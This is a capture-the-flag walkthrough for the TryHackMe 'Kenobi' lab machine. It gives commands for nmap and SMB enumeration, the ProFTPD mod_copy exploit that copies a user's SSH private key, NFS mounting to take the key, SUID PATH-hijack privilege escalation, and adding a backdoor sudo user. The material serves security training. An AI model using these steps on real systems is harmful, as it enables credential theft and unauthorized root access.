1-Reconnaissance
{Nmap -sT -sV 10.10.251.207}
· First port is ftp <21> we check for anonymous login and if worked we get everything can get
· Second port is ssh <22> can give you shell access with password or id_rsa file
· Third one http <80> installed apache it might contain webpage that maybe contain sql or any web vulnerability
· Fourth is rpcbind a server that converts remote procedure call (RPC) program number into universal addresses.
· 5 & 6 are samba
· Seventh nfs_acl share directory work with rpcbind
2-Scanning and Enumeration
First we check the samba for any helpful files
{Smbclient -N -L /IP-here//}
We can check anonymous share using this command
{ smbclient //10.10.251.207/anonymous}
As you see we found log.txt and downloaded it. After reading the file we knew:
· Information generated for Kenobi when generating an SSH key for the user
· Information about the ProFTPD server.
Now our target to get ssh private key using ProFTPD . let’s scan
{Searchsploit ProFTPd 1.3.5}
As expected We found mod_copy Command Execution. To exploit it we start netcat on ftp port then execute commands
Now we need to scan rpcbind to know if ther’s share file that we can access
{nmap -p 111 — script=nfs-ls,nfs-statfs,nfs-showmount 10.10.251.207}
We found /var* . that’s mean everything in var contain tmp file also
We will copy any file we want to this directory then we download /var directory
· First step connects to ftp
{Nc ip-here 21} *21 ftp port
· Then we use mod_copy command execution as we found in searchsploit
SITE CPFR /home/Kenobi/.ssh/id_rsa *copy from this (wanted file)
SITE CPTO /var/tmp/id_rsa *copy to this
Now we’re going to copy /var to our computer using mount command
mkdir /Kenobi (in Desktop or anywhere you want)
mount ip-here:/var /root/Desktop/Kenobi *to download /var
ls -la /root/Desktop/Kenobi
Now copy the id_rsa to our system and use it to login into Kenobi system as user
{ssh -I id_rsa username@ip}
3-Privilege Escalation
We will use the SUID for upgrade our privilege
*For more info in Reference
First command to scan for any file that we can use it and have sudo privilege
{find / -perm -u=s -type f 2>/dev/null}
(/usr/bin/menu) is new file let’s try to use it
· First go to tmp folder
· Second copy shell to curl
· Third give permission to curl
· Third export the path to our folder
· Fourth use the file and check if you got shell
· Last thing we check our permission using {id} command
4-Additional Move
add new user with sudo permission
Text me for any correction Eng Saif
Reference
https://tryhackme.com/room/kenobi
https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
http://www.proftpd.org/docs/contrib/mod_copy.html
